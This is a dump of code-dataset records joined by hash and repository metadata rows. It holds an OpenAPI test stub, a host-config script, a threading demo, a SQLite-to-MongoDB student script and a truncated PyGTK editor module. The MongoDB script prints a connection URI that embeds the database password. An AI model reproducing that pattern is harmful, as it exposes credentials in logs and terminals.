Delve Client SDK
This is a Client SDK for Delve API # noqa: E501
The version of the OpenAPI document: 1.1.3
Contact: [email protected]
Generated by: https://openapi-generator.tech
"""
import sys
import unittest
import rai_api
from rai_api.model.cons_all_of import ConsAllOf
from rai_api.model.linked_list import LinkedList
from rai_api.model.syntax_node import SyntaxNode
globals()['ConsAllOf'] = ConsAllOf
globals()['LinkedList'] = LinkedList
globals()['SyntaxNode'] = SyntaxNode
from rai_api.model.cons import Cons
class TestCons(unittest.TestCase):
"""Cons unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testCons(self):
"""Test Cons"""
# FIXME: construct object with mandatory attributes with example values
# model = Cons() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
] | |
9b57f8a69b3a2a57d25b3c849795e6816bdaf79f | 34cc1aeb6f7d0e612026905d12c85aeea989a83a | /host.py | ea56c1dc1b3f7bead8cf4ca8fd139af5b8e6233d | [] | no_license | mverzett/.bin | 83de7c0c0c16d75ca39df6c5ed95957f4ec79f9a | a1b652f5660c07690f61e79793372ad7e9d6099d | refs/heads/master | 2021-01-18T15:05:42.366559 | 2019-07-11T17:51:05 | 2019-07-11T17:51:05 | 8,330,975 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 755 | py | import os
host = os.environ['HOSTNAME']
public_html = ''
root_dir = ''
web_home = ''
#Site-dependent information
if 'wisc' in host:
public_html = '/afs/hep.wisc.edu/home/%s/public_html/' % os.environ['USER']
root_dir = 'public_html'
web_home = 'http://www.hep.wisc.edu/~mverzett'
elif 'cern.ch' in host:
initial = os.environ['USER'][0]
public_html = '/afs/cern.ch/user/%s/%s/www/' % (initial, os.environ['USER'])
root_dir = 'www'
web_home = 'https://mverzett.web.cern.ch/mverzett'
elif 'fnal.gov' in host:
public_html = os.path.join(os.environ['HOME'],'public_html')
root_dir = 'public_html'
web_home = 'http://home.fnal.gov/~%s' % os.environ['USER']
else:
    raise ValueError("Site %s not recognised!" % host)
| [
"[email protected]"
] | |
c34762a2d3793cb0cfb3c1d72c81137d5420837e | 663c108dca9c4a30b7dfdc825a8f147ba873da52 | /venv/multithreading/56InterThreadComEventObjectRemoveConsumerSleep.py | b926cace99d531efc0f3c545ed4a68c5d8f0d0b3 | [] | no_license | ksrntheja/08-Python-Core | 54c5a1e6e42548c10914f747ef64e61335e5f428 | b5fe25eead8a0fcbab0757b118d15eba09b891ba | refs/heads/master | 2022-10-02T04:11:07.845269 | 2020-06-02T15:23:18 | 2020-06-02T15:23:18 | 261,644,116 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 811 | py | from threading import *
import time
def producer(event):
print("Producer thread producing items:")
print("Producer thread giving notification by setting event")
event.set()
def consumer(event):
print('Consumer sleeping')
time.sleep(3)
    print(t1.name, 'is active:', t1.is_alive())
    print("Consumer thread is waiting for update")
event.wait()
print("Consumer thread got notification and consuming items")
event = Event()
t1 = Thread(target=producer, args=(event,))
t2 = Thread(target=consumer, args=(event,))
t2.start()
t1.start()
# Consumer sleeping
# Producer thread producing items:
# Producer thread giving notification by setting event
# Thread-1 is active: False
# Consumer thread is waiting for update
# Consumer thread got notification and consuming items
| [
"[email protected]"
] | |
be3ca6a59c8af3295105d05abd669f9eb2c92d43 | b042a014d668bd2d9e07bcfc756022137e5b0f97 | /module3-nosql-and-document-oriented-databases/assignment3.py | 2489aa19f8091748835faafd36ce7732de8ef74d | [
"MIT"
] | permissive | JeffreyAsuncion/DS-Unit-3-Sprint-2-SQL-and-Databases | 82895211b55b08b99e9c9c426f37cb04ba6f57c6 | 5d22fe0e2dd09c4130232b5f17c52e271d9b7f6b | refs/heads/master | 2022-11-24T10:48:13.916529 | 2020-08-01T05:06:58 | 2020-08-01T05:06:58 | 281,016,493 | 0 | 0 | null | 2020-07-20T04:51:39 | 2020-07-20T04:51:39 | null | UTF-8 | Python | false | false | 1,557 | py | # Store RPG data in our MongoDB instance
import os
import sqlite3
import pandas as pd
import pymongo
from dotenv import load_dotenv
from pymongo import MongoClient
from pdb import set_trace as breakpoint
#
# Part One: get data from 1. Sqlite or 2. Postgresql
#
DB_FILEPATH = os.path.join(os.path.dirname(__file__), "..", "rpg_db.sqlite3")
connection = sqlite3.connect(DB_FILEPATH)
print("CONNECTION:", connection)
cursor = connection.cursor()
print("CURSOR", cursor)
query = "SELECT * FROM charactercreator_character;"
results = cursor.execute(query).fetchall()
# print("RESULT", results) #> returns cursor object w/o results (need to fetch the results)
# print("type:", type(results))
#
# Prepare df
#
columns = ['character_id', 'name', 'level', 'exp', 'hp', 'strength', 'intelligence', 'dexterity', 'wisdom']
rpg_df = pd.DataFrame(results, columns=columns)
print(rpg_df.head())
#
# Convert the DataFrame rows to a list of dicts for MongoDB insertion
#
rpg_dict = rpg_df.to_dict('records')
#
# Connect to MongoDB Atlas using credentials loaded from the environment
#
load_dotenv()
DB_USER = os.getenv("MONGO_USER", default="OOPS")
DB_PASSWORD = os.getenv("MONGO_PASSWORD", default="OOPS")
CLUSTER_NAME = os.getenv("MONGO_CLUSTER_NAME", default="OOPS")
connection_uri = f"mongodb+srv://{DB_USER}:{DB_PASSWORD}@{CLUSTER_NAME}.mongodb.net/test?retryWrites=true&w=majority"
print("\n----------------")
print("URI:", connection_uri)
client = pymongo.MongoClient(connection_uri)
#
# Insert one document per character into the collection
#
db = client.rpg_database
collection = db.charactercreator_character
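# Optional sanity check to run after the insert_many call below (sketch;
# `character_id` is one of the columns defined above):
#
#     print("Inserted docs:", collection.count_documents({}))
#     print("Sample doc:", collection.find_one({"character_id": 1}))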
collection.insert_many(rpg_dict) | [
"[email protected]"
] | |
56936c2628230019da57a06dab6a469fd426fba2 | b7b2f80ab5e1ee0ea028576e3014b62b8d3a8d7e | /pyedit/pyedit-009/pedwin.py | 8c09a2eb25c02fcc984578038fd24fbea4242150 | [] | no_license | pglen/pgpygtk | 4d1405478a714f003984cf3e3db04ff1f767470b | 33f58010e304f1a312f2356de453ecedb7aa21ef | refs/heads/master | 2021-01-22T01:18:52.238415 | 2019-01-01T01:37:24 | 2019-01-01T01:37:24 | 102,215,955 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 36,392 | py | #!/usr/bin/env python
import signal, os, time, sys
import gobject, gtk, gconf
import subprocess
import peddoc, pedconfig, pedofd
import pedync
# Into our namespace
from pedmenu import *
from pedui import *
from pedutil import *
STATUSCOUNT = 5     # Length of the status bar timeout (in sec)
treestore = None
notebook = None
#def scroll(aa, bb):
# print aa, bb
# -----------------------------------------------------------------------
# Create document
class edPane(gtk.VPaned):
def __init__(self, buff = [], focus = False):
pos = gconf.client_get_default().\
get_int(pedconfig.conf.config_reg + "/vpaned")
if pos == 0: pos = 120
gtk.VPaned.__init__(self)
self.set_border_width(5)
self.set_position(pos)
self.vbox = edwin(buff);
self.add2(self.vbox)
self.vbox2 = edwin(buff, True)
self.add1(self.vbox2)
# Shortcuts to access the editor windows
self.area = self.vbox.area
self.area2 = self.vbox2.area
# -----------------------------------------------------------------------
# Create main document widget with scroll bars
class edwin(gtk.VBox):
def __init__(self, buff, readonly = False):
global notebook, mained
gtk.VBox.__init__(self)
area = peddoc.pedDoc(buff, mained, readonly)
#print "created", area, mained
# Give access to notebook and main editor window
area.notebook = notebook
area.mained = mained
frame = gtk.Frame(); frame.add(area)
hbox = gtk.HBox()
hbox.pack_start(frame, True, True)
hbox.pack_end(area.vscroll, False, False)
self.pack_start(hbox, True, True)
self.pack_end(area.hscroll, False, False)
# Make it acessable:
self.area = area
# ------------------------------------------------------------------------
# Define Application Main Window class
class EdMainWindow():
def __init__(self, fname, parent, names):
self.full = False
self.fcount = 0
self.statuscount = 0
self.alt = False
register_stock_icons()
global mained
mained = self
# Create the toplevel window
window = gtk.Window(gtk.WINDOW_TOPLEVEL)
self.window = window
www = gtk.gdk.screen_width(); hhh = gtk.gdk.screen_height();
if pedconfig.conf.full_screen:
window.set_default_size(www, hhh)
else:
xx = gconf.client_get_default().get_int(pedconfig.conf.config_reg + "/xx")
yy = gconf.client_get_default().get_int(pedconfig.conf.config_reg + "/yy")
ww = gconf.client_get_default().get_int(pedconfig.conf.config_reg + "/ww")
hh = gconf.client_get_default().get_int(pedconfig.conf.config_reg + "/hh")
if ww == 0 or hh == 0:
window.set_position(gtk.WIN_POS_CENTER)
window.set_default_size(7*www/8, 5*hhh/8)
window.move(www / 32, hhh / 10)
else:
window.set_default_size(ww, hh)
window.move(xx, yy)
window.set_icon_from_file(get_img_path("pyedit.png"))
merge = gtk.UIManager()
window.set_data("ui-manager", merge)
aa = create_action_group(self)
merge.insert_action_group(aa, 0)
window.add_accel_group(merge.get_accel_group())
try:
mergeid = merge.add_ui_from_string(ui_info)
except gobject.GError, msg:
print "Building menus failed: %s" % msg
# Add MRU
for cnt in range(6):
ss = "/sess_%d" % cnt
fname = gconf.client_get_default().get_string\
(pedconfig.conf.config_reg + ss)
            if fname:   # gconf returns None when the key is unset
self.add_mru(merge, aa, fname, ss)
merge_id = merge.new_merge_id()
merge.add_ui(merge_id, "ui/MenuBar/FileMenu/SaveAs", "", None, gtk.UI_MANAGER_SEPARATOR, False)
mbar = merge.get_widget("/MenuBar")
mbar.show()
window.set_events( gtk.gdk.POINTER_MOTION_MASK |
gtk.gdk.POINTER_MOTION_HINT_MASK |
gtk.gdk.BUTTON_PRESS_MASK |
gtk.gdk.BUTTON_RELEASE_MASK |
gtk.gdk.KEY_PRESS_MASK |
gtk.gdk.KEY_RELEASE_MASK |
gtk.gdk.FOCUS_CHANGE_MASK )
#window.set_events( gtk.gdk.ALL_EVENTS_MASK)
global notebook
# Create note for the main window, give access to it for all
notebook = gtk.Notebook(); self.notebook = notebook
notebook.popup_enable()
notebook.set_scrollable(True)
#notebook.add_events(gtk.gdk.FOCUS_CHANGE_MASK)
notebook.add_events(gtk.gdk.ALL_EVENTS_MASK)
notebook.connect("switch-page", self.note_swpage_cb)
notebook.connect("focus-in-event", self.note_focus_in)
# Futile attempts
#notebook.connect("change-current-page", self.note_page_cb)
#notebook.connect("grab-focus", self.note_grab_focus_cb)
#notebook.connect("focus", self.note_focus_cb)
#notebook.connect("create-window", self.note_create_cb)
#notebook.connect("enter-notify-event", self.note_enter_notify)
window.connect("window_state_event", self.update_resize_grip)
window.connect("destroy", OnExit)
window.connect("key-press-event", self.area_key)
window.connect("key-release-event", self.area_key)
#window.connect("set-focus", self.area_focus)
window.connect("focus-in-event", self.area_focus_in)
window.connect("focus-out-event", self.area_focus_out)
window.connect("window-state-event", self.area_winstate)
#window.connect("area-focus-event", self.area_focus_in)
#window.connect("event", self.area_event)
#window.connect("enter-notify-event", self.area_enter)
#window.connect("leave-notify-event", self.area_leave)
#window.connect("event", self.unmap)
table = gtk.Table(2, 4, False)
window.add(table)
table.attach(mbar,
# X direction # # Y direction
0, 1, 0, 1,
gtk.EXPAND | gtk.FILL, 0,
0, 0);
tbar = merge.get_widget("/ToolBar"); tbar.set_tooltips(True)
tbar.show()
table.attach(tbar,
# X direction # # Y direction
0, 1, 1, 2,
gtk.EXPAND | gtk.FILL, 0,
0, 0)
hpaned = gtk.HPaned(); hpaned.set_border_width(5)
scroll = gtk.ScrolledWindow()
treeview = self.create_tree()
treeview.connect("row-activated", self.tree_sel)
treeview.connect("cursor-changed", self.tree_sel_row)
self.treeview = treeview
scroll.add(treeview)
frame2 = gtk.Frame(); frame2.add(scroll)
hpaned.add(frame2)
self.hpanepos = gconf.client_get_default(). \
get_int(pedconfig.conf.config_reg + "/hpaned")
if self.hpanepos == 0: self.hpanepos = 200
hpaned.set_position(self.hpanepos)
hpaned.pack2(notebook)
self.hpaned = hpaned
# Create statusbars
self.statusbar = gtk.Statusbar()
self.statusbar2 = gtk.Statusbar()
slab = gtk.Label(" ")
hpane2 = gtk.HPaned()
hpane2.set_position(self.get_width() - 250)
hpane2.pack2(self.statusbar2)
shbox = gtk.HBox()
shbox.pack_start(slab, False)
shbox.pack_start(self.statusbar)
hpane2.pack1(shbox)
# Main Pane
table.attach(hpaned,
# X direction Y direction
0, 1, 2, 3,
gtk.EXPAND | gtk.FILL, gtk.EXPAND | gtk.FILL,
0, 0)
table.attach(hpane2,
#table.attach(self.statusbar,
# X direction Y direction
0, 1, 3, 4,
gtk.EXPAND | gtk.FILL, 0,
0, 0)
window.show_all()
# ----------------------------------------------------------------
cnt = 0
# Read in buffers
for aa in names:
aaa = os.path.realpath(aa)
#print "loading file: ", aaa
vpaned = edPane()
ret = vpaned.area.loadfile(aaa)
if not ret:
self.update_statusbar("Cannot read file '{0:s}'".format(aaa))
continue
ret = vpaned.area2.loadfile(aaa)
cnt += 1
notebook.append_page(vpaned)
vpaned.area.set_tablabel()
if cnt == 0:
#print "No file on command line, creating new", os.getcwd()
fcnt = gconf.client_get_default().get_int\
(pedconfig.conf.config_reg + "/cnt")
# Load old session
for nnn in range(fcnt):
ss = "/sess_%d" % nnn
fff = gconf.client_get_default().get_string\
(pedconfig.conf.config_reg + ss)
#print "loading ", fff
vpaned = edPane()
ret = vpaned.area.loadfile(fff)
if not ret:
self.update_statusbar("Cannot read file '{0:s}'".format(fff))
continue
vpaned.area2.loadfile(fff)
notebook.append_page(vpaned)
vpaned.area.set_tablabel()
# Show newly created buffers:
window.show_all()
# Set last file
fff = gconf.client_get_default().get_string\
(pedconfig.conf.config_reg + "/curr")
#print "curr file", fff
cc = notebook.get_n_pages()
for mm in range(cc):
vcurr = notebook.get_nth_page(mm)
if vcurr.area.fname == fff:
#print "found buff", fff
notebook.set_current_page(mm)
self.window.set_focus(vcurr.vbox.area)
break
# Set the signal handler for 1s tick
signal.signal(signal.SIGALRM, handler)
signal.alarm(1)
self.update_statusbar("Initial")
# --------------------------------------------------------------------
def add_mru(self, merge, action_group, fname, mru):
sname = os.path.basename(fname)
#gtk.Action(name, label, tooltip, stock_id)
ac = gtk.Action(mru, sname, fname, None)
ac.connect('activate', self.activate_action)
action_group.add_action(ac)
merge_id = merge.new_merge_id()
#add_ui(merge_id, path, name, action, type, top)
merge.add_ui(merge_id, "/MenuBar/FileMenu/SaveAs", \
mru, mru, gtk.UI_MANAGER_MENUITEM, False)
def area_winstate(self, arg1, arg2):
pass
#print "area_winstate", arg1, arg2
#print "state", self.window.get_state()
def unmap(self, arg1, arg2):
print "unmap", arg1, arg2
def tree_sel_row(self, xtree):
sel = xtree.get_selection()
xmodel, xiter = sel.get_selected()
xstr = xmodel.get_value(xiter, 0)
vcurr = notebook.get_nth_page(notebook.get_current_page())
vcurr.area.locate(xstr)
def tree_sel(self, xtree, xiter, xpath):
        print "tree_sel", xtree, xiter, xpath
# Focus on main doc
vcurr = notebook.get_nth_page(notebook.get_current_page())
self.window.activate_focus()
self.window.set_focus(vcurr.vbox.area)
# Call key handler
def area_key(self, area, event):
# Inspect key press before treeview gets it
if self.window.get_focus() == self.treeview:
# Do key down:
if event.type == gtk.gdk.KEY_PRESS:
if event.keyval == gtk.keysyms.Alt_L or \
event.keyval == gtk.keysyms.Alt_R:
self.alt = True;
if event.keyval >= gtk.keysyms._1 and event.keyval <= gtk.keysyms._9:
print "pedwin Alt num", event.keyval - gtk.keysyms._1
# Focus on main doc
vcurr = notebook.get_nth_page(notebook.get_current_page())
self.window.set_focus(vcurr.vbox.area)
elif event.type == gtk.gdk.KEY_RELEASE:
if event.keyval == gtk.keysyms.Alt_L or \
event.keyval == gtk.keysyms.Alt_R:
self.alt = False;
def get_height(self):
xx, yy = self.window.get_size()
return yy
def get_width(self):
xx, yy = self.window.get_size()
return xx
def start_tree(self):
global treestore
if not treestore:
treestore = gtk.TreeStore(str)
# Delete previous contents
try:
while True:
root = treestore.get_iter_first()
if not root:
break
try:
treestore.remove(root)
except:
print "Exception on rm treestore"
except:
print "strt_tree", sys.exc_info()
pass
piter = treestore.append(None, ["Extracting .."])
treestore.append(piter, ["None .."])
# --------------------------------------------------------------------
def create_tree(self, text = None):
global treestore
self.start_tree()
# create the TreeView using treestore
tv = gtk.TreeView(treestore)
# create a CellRendererText to render the data
cell = gtk.CellRendererText()
# create the TreeViewColumn to display the data
tvcolumn = gtk.TreeViewColumn('Functions')
# add the cell to the tvcolumn and allow it to expand
tvcolumn.pack_start(cell, True)
# set the cell "text" attribute to column 0 - retrieve text
# from that column in treestore
tvcolumn.add_attribute(cell, 'text', 0)
# add tvcolumn to treeview
tv.append_column(tvcolumn)
return tv
# --------------------------------------------------------------------
def update_treestore(self, text):
global treestore
if not treestore: return
# Delete previous contents
try:
while True:
root = treestore.get_iter_first()
if not root:
break
try:
treestore.remove(root)
except:
print "except: treestore remove"
except:
print "update_tree", sys.exc_info()
pass
if not text:
return
try:
for line in text:
piter = treestore.append(None, [cut_lead_space(line)])
except:
pass
#print sys.exc_info()
# --------------------------------------------------------------------
# Handlers:
def area_event(self, win, act):
print "pedwin area event", win, act
def area_leave(self, win, act):
pass
#print "pedwin area leave", win, act
def area_enter(self, win, act):
pass
#print "pedwin area enter", win, act
def area_focus(self, win, act):
pass
#print "pedwin area focus", win, act
def area_focus_in(self, win, act):
#print "area focus in", win, act
# This was needed as pygtk leaves the alt key hanging
pedconfig.conf.keyh.reset()
# Focus on main doc
vcurr = notebook.get_nth_page(notebook.get_current_page())
if vcurr:
self.window.set_focus(vcurr.vbox.area)
def area_focus_out(self, win, act):
pass
#print "area focus out", win, act
# Note message handlers:
def note_focus_in(self, win, act):
#print "note_focus_in", win, act
vcurr = notebook.get_nth_page(notebook.get_current_page())
if vcurr:
self.window.set_focus(vcurr.vbox.area)
def note_enter_notify(self, win):
pass
#print "note_enter_notify", win
def note_grab_focus_cb(self, win):
#print "note_grab_focus_cb", win
vcurr = notebook.get_nth_page(notebook.get_current_page())
if vcurr:
self.window.set_focus(vcurr.vbox.area)
def note_swpage_cb(self, tabx, page, num):
#print "note_swpage", num
vcurr = tabx.get_nth_page(num)
self.window.set_title("pyedit: " + vcurr.area.fname);
self.window.set_focus(vcurr.vbox.area)
#self.update_statusbar("Switched to '{1:s}'".
# format(num, vcurr.area.fname))
def note_page_cb(self, tabx, child, num):
pass
#print "note_page"
def note_focus_cb(self, tabx, foc):
#print "note_focus_cb"
vcurr = notebook.get_nth_page(notebook.get_current_page())
if vcurr:
self.window.set_focus(vcurr.vbox.area)
def note_create_cb(self, tabx, page, xx, yy):
pass
#print "note_create"
# Note message handlers end
def activate_qhelp(self, action):
self.update_statusbar("Showing quick help")
try:
rr = get_exec_path("QHELP")
#pid = os.spawnlp(os.P_NOWAIT, "pangview.py", "pangview", rr)
ret = subprocess.Popen(["pangview.py", rr])
except:
pedync.message("\n Cannot launch the pangview.py utility. \n\n"
" (Please install)")
def activate_about(self, action):
self.update_statusbar("Showing About Dialog")
pedync.about()
def activate_action(self, action):
#dialog = gtk.MessageDialog(None, gtk.DIALOG_DESTROY_WITH_PARENT,
# gtk.MESSAGE_INFO, gtk.BUTTONS_CLOSE,
# 'Action: "%s" of type "%s"' % (action.get_name(), type(action)))
# Close dialog on user response
#dialog.connect ("response", lambda d, r: d.destroy())
#dialog.show()
strx = action.get_name()
#print "activate_action", strx
if strx == "New":
# Find non existing file
cnt = self.fcount + 1; fff = ""
base, ext = os.path.splitext(pedconfig.conf.UNTITLED)
while True:
fff = "%s_%d.txt" % (base, cnt)
#print fff
if not os.path.isfile(fff):
break;
cnt += 1
self.fcount = cnt
# Touch
#open(fff, "w").close()
vpaned = edPane([])
vpaned.area.fname = os.path.realpath(fff)
global notebook
notebook.append_page(vpaned)
vpaned.area.set_tablabel()
#label = gtk.Label(" " + os.path.basename(aa) + " ")
#notebook.set_tab_label(vpaned, label)
self.window.show_all()
# Make it current
nn = notebook.get_n_pages();
if nn:
vcurr = notebook.set_current_page(nn-1)
vcurr = notebook.get_nth_page(nn-1)
self.window.set_focus(vcurr.vbox.area)
if strx == "Open":
#print "open"
# Traditional open file
'''but = "Cancel", gtk.BUTTONS_CANCEL, "Open File", gtk.BUTTONS_OK
fc = gtk.FileChooserDialog("Open file", self.window, \
gtk.FILE_CHOOSER_ACTION_OPEN, but)
fc.set_default_response(gtk.BUTTONS_OK)
fc.connect("response", self.done_open_fc)
#fc.set_current_name(self.fname)
fc.run() '''
# Simplified
fname = pedofd.ofd("")
if fname != "":
self.openfile(fname)
if strx == "Save":
vcurr = notebook.get_nth_page(notebook.get_current_page())
vcurr.area.save()
if strx == "SaveAs":
vcurr = notebook.get_nth_page(notebook.get_current_page())
vcurr.area.saveas()
if strx == "Close":
self.closedoc()
if strx == "Copy":
#print "copy"
nn2 = notebook.get_current_page()
vcurr2 = notebook.get_nth_page(nn2)
if vcurr2:
pedconfig.conf.keyh.act.ctrl_c(vcurr2.area)
if strx == "Cut":
#print "cut"
nn2 = notebook.get_current_page()
vcurr2 = notebook.get_nth_page(nn2)
if vcurr2:
pedconfig.conf.keyh.act.ctrl_x(vcurr2.area)
if strx == "Paste":
#print "paste"
nn2 = notebook.get_current_page()
vcurr2 = notebook.get_nth_page(nn2)
if vcurr2:
pedconfig.conf.keyh.act.ctrl_v(vcurr2.area)
if strx == "Goto":
nn2 = notebook.get_current_page()
vcurr2 = notebook.get_nth_page(nn2)
if vcurr2:
pedconfig.conf.keyh.act.alt_g(vcurr2.area)
if strx == "Find":
print "find"
nn2 = notebook.get_current_page()
vcurr2 = notebook.get_nth_page(nn2)
if vcurr2:
pedconfig.conf.keyh.act.ctrl_f(vcurr2.area)
if strx == "Record":
#print "record"
nn2 = notebook.get_current_page()
vcurr2 = notebook.get_nth_page(nn2)
if vcurr2:
pedconfig.conf.keyh.act.f7(vcurr2.area)
if strx == "Play":
nn2 = notebook.get_current_page()
vcurr2 = notebook.get_nth_page(nn2)
if vcurr2:
pedconfig.conf.keyh.act.f8(vcurr2.area)
if strx == "Animate":
nn2 = notebook.get_current_page()
vcurr2 = notebook.get_nth_page(nn2)
if vcurr2:
pedconfig.conf.keyh.act.f8(vcurr2.area, True)
if strx == "Undo":
nn2 = notebook.get_current_page()
vcurr2 = notebook.get_nth_page(nn2)
if vcurr2:
pedconfig.conf.keyh.act.ctrl_z(vcurr2.area)
if strx == "Redo":
nn2 = notebook.get_current_page()
vcurr2 = notebook.get_nth_page(nn2)
if vcurr2:
pedconfig.conf.keyh.act.ctrl_y(vcurr2.area)
if strx == "SaveAll":
nn2 = notebook.get_current_page()
vcurr2 = notebook.get_nth_page(nn2)
if vcurr2:
pedconfig.conf.keyh.act.alt_a(vcurr2.area)
if strx == "Discard Undo":
nn2 = notebook.get_current_page()
vcurr2 = notebook.get_nth_page(nn2)
if vcurr2:
vcurr2.area.delundo()
if strx == "NextWin":
self.nextwin()
if strx == "PrevWin":
self.prevwin()
if strx.find("/sess_") >= 0:
fname = gconf.client_get_default().get_string\
(pedconfig.conf.config_reg + strx)
self.openfile(fname)
if strx == "Help":
#pedync.message("\n Help: Work in progress \n")
nn2 = notebook.get_current_page()
vcurr2 = notebook.get_nth_page(nn2)
if vcurr2:
pedconfig.conf.keyh.act.f1(vcurr2.area)
if strx == "Settings":
pedync.message("\n Settings: Work in progress \n")
def closedoc(self):
cc = notebook.get_n_pages()
nn = notebook.get_current_page()
vcurr = notebook.get_nth_page(nn)
# Disable close
if vcurr.area.closedoc():
return
# Wrap around
if nn == 0: mm = cc - 1
else: mm = nn - 1
notebook.set_current_page(mm)
nn2 = notebook.get_current_page()
vcurr2 = notebook.get_nth_page(nn2)
self.window.set_focus(vcurr2.vbox.area)
notebook.remove_page(nn)
self.window.show_all()
def firstwin(self):
cc = notebook.get_n_pages()
if cc == 0:
return
notebook.set_current_page(0)
nn2 = notebook.get_current_page()
vcurr2 = notebook.get_nth_page(nn2)
self.window.set_focus(vcurr2.vbox.area)
self.window.show_all()
def lastwin(self):
cc = notebook.get_n_pages()
if cc == 0:
return
notebook.set_current_page(cc-1)
nn2 = notebook.get_current_page()
vcurr2 = notebook.get_nth_page(nn2)
self.window.set_focus(vcurr2.vbox.area)
self.window.show_all()
def nextwin(self):
cc = notebook.get_n_pages()
nn = notebook.get_current_page()
vcurr = notebook.get_nth_page(nn)
# Wrap around if needed
if nn == cc - 1: return # mm = 0
else: mm = nn + 1
notebook.set_current_page(mm)
nn2 = notebook.get_current_page()
vcurr2 = notebook.get_nth_page(nn2)
self.window.set_focus(vcurr2.vbox.area)
self.window.show_all()
def prevwin(self):
cc = notebook.get_n_pages()
nn = notebook.get_current_page()
vcurr = notebook.get_nth_page(nn)
# Wrap around if needed
if nn == 0: return # mm = cc - 1
else: mm = nn - 1
notebook.set_current_page(mm)
nn2 = notebook.get_current_page()
vcurr2 = notebook.get_nth_page(nn2)
self.window.set_focus(vcurr2.vbox.area)
self.window.show_all()
'''def done_open_fc(self, win, resp):
#print "done_open_fc", win, resp
if resp == gtk.BUTTONS_OK:
fname = win.get_filename()
if not fname:
#print "Must have filename"
self.update_statusbar("No filename specified")
pass
else:
self.openfile(fname)
win.destroy()'''
def saveall(self):
#print "saveall"
# Save all files
nn = notebook.get_n_pages(); cnt = 0; cnt2 = 0
while True:
if cnt >= nn: break
ppp = notebook.get_nth_page(cnt)
if ppp.area.changed:
ppp.area.writefile()
cnt2 += 1
cnt += 1
self.update_statusbar("%d of %d buffers saved." % (cnt2, nn))
# -------------------------------------------------------------------
def openfile(self, fname):
# Is it already loaded? ... activate
nn = notebook.get_n_pages();
for aa in range(nn):
vcurr = notebook.get_nth_page(aa)
if vcurr.area.fname == fname:
self.update_statusbar("Already open, activating '{0:s}'".format(fname))
vcurr = notebook.set_current_page(aa)
vcurr = notebook.get_nth_page(aa)
self.window.set_focus(vcurr.vbox.area)
return
#print "opening '"+ fname + "'"
self.update_statusbar("Opening file '{0:s}'".format(fname))
vpaned = edPane()
ret = vpaned.area.loadfile(os.path.realpath(fname))
if not ret:
self.update_statusbar("Cannot read file '{0:s}'".format(fname))
return
vpaned.area2.loadfile(os.path.realpath(fname))
self.update_statusbar("Opened file '{0:s}'".format(fname))
# Add to the list of buffers
notebook.append_page(vpaned)
vpaned.area.set_tablabel()
self.window.show_all()
# Make it current
nn = notebook.get_n_pages();
if nn:
vcurr = notebook.set_current_page(nn-1)
vcurr = notebook.get_nth_page(nn-1)
self.window.set_focus(vcurr.vbox.area)
def activate_exit(self, action):
#print "activate_exit called"
OnExit(self.window)
def activate_quit(self, action):
#print "activate_quit called"
OnExit(self.window, False)
def activate_radio_action(self, action, current):
active = current.get_active()
value = current.get_current_value()
if active:
dialog = gtk.MessageDialog(self, gtk.DIALOG_DESTROY_WITH_PARENT,
gtk.MESSAGE_INFO, gtk.BUTTONS_CLOSE,
"You activated radio action: \"%s\" of type \"%s\".\nCurrent value: %d" %
(current.get_name(), type(current), value))
# Close dialog on user response
dialog.connect("response", lambda d, r: d.destroy())
dialog.show()
# This is the line count / pos status bar
def update_statusbar2(self, xx = 0, yy = 0, ins = 0, tlen = 0):
# Always update line / col
        if ins: str2 = "INS"
        else:   str2 = "OVR"
strx2 = "Ln {0:d} Col {1:d} Tot {3:d} {2:s} ".\
format(yy, xx, str2, tlen)
self.statusbar2.pop(0)
self.statusbar2.push(0, strx2)
    def update_statusbar(self, strx):
        # Clear any previous message, underflow is allowed
        self.statusbar.pop(0)
        if not strx:
            # push() needs the context id as its first argument
            self.statusbar.push(0, "Idle")
            return
        self.statusbar.push(0, strx)
        self.statuscount = STATUSCOUNT
def update_resize_grip(self, widget, event):
#print "update state", event, event.changed_mask
#self.window.set_focus(notebook)
mask = gtk.gdk.WINDOW_STATE_MAXIMIZED | gtk.gdk.WINDOW_STATE_FULLSCREEN
if (event.changed_mask & mask):
self.statusbar.set_has_resize_grip(not (event.new_window_state & mask))
# ------------------------------------------------------------------------
def OnExit(arg, prompt = True):
#print "onexit"
arg.set_title("Exiting ...")
# Save UI related data
pos = mained.hpaned.get_position()
pos = max(pos, 1)
gconf.client_get_default().set_int\
(pedconfig.conf.config_reg + "/hpaned", pos)
firstpage = notebook.get_nth_page(0)
if firstpage:
pos = firstpage.get_position()
pos = max(pos, 1)
gconf.client_get_default().set_int\
(pedconfig.conf.config_reg + "/vpaned", pos)
# Do not save full screen coordinates (when used F11)
if not mained.full:
xx, yy = mained.window.get_position()
gconf.client_get_default().set_int\
(pedconfig.conf.config_reg + "/xx", xx)
gconf.client_get_default().set_int\
(pedconfig.conf.config_reg + "/yy", yy)
ww, hh = mained.window.get_size()
gconf.client_get_default().set_int\
(pedconfig.conf.config_reg + "/ww", ww)
gconf.client_get_default().set_int\
(pedconfig.conf.config_reg + "/hh", hh)
# Save current doc:
vcurr = notebook.get_nth_page(notebook.get_current_page())
if vcurr:
gconf.client_get_default().set_string\
(pedconfig.conf.config_reg + "/curr",\
vcurr.area.fname)
# Prompt for save files
nn = notebook.get_n_pages(); cnt = 0
while True:
if cnt >= nn: break
ppp = notebook.get_nth_page(cnt)
#print "page:", ppp.area
ppp.area.saveparms()
ss = "/sess_%d" % cnt
if cnt < 8:
gconf.client_get_default().set_string\
(pedconfig.conf.config_reg + ss,\
ppp.area.fname)
if prompt:
if ppp.area.changed:
msg = "\nWould you like to save:\n\n \"%s\" \n" % ppp.area.fname
rp = pedync.yes_no_cancel("pyedit: Save File ?", msg)
if rp == gtk.RESPONSE_YES:
ppp.area.save()
if rp == gtk.RESPONSE_NO:
#print "gtk.RESPONSE_NO"
pass
if rp == gtk.RESPONSE_CANCEL or \
rp == gtk.RESPONSE_REJECT or \
rp == gtk.RESPONSE_CLOSE or \
rp == gtk.RESPONSE_DELETE_EVENT:
return
else:
# Rescue to temporary:
if ppp.area.changed:
hhh = hash_name(ppp.area.fname) + ".rescue"
xfile = pedconfig.conf.config_dir + "/" + hhh
print "Rescuing", xfile
writefile(xfile, ppp.area.text)
cnt += 1
gconf.client_get_default().set_int\
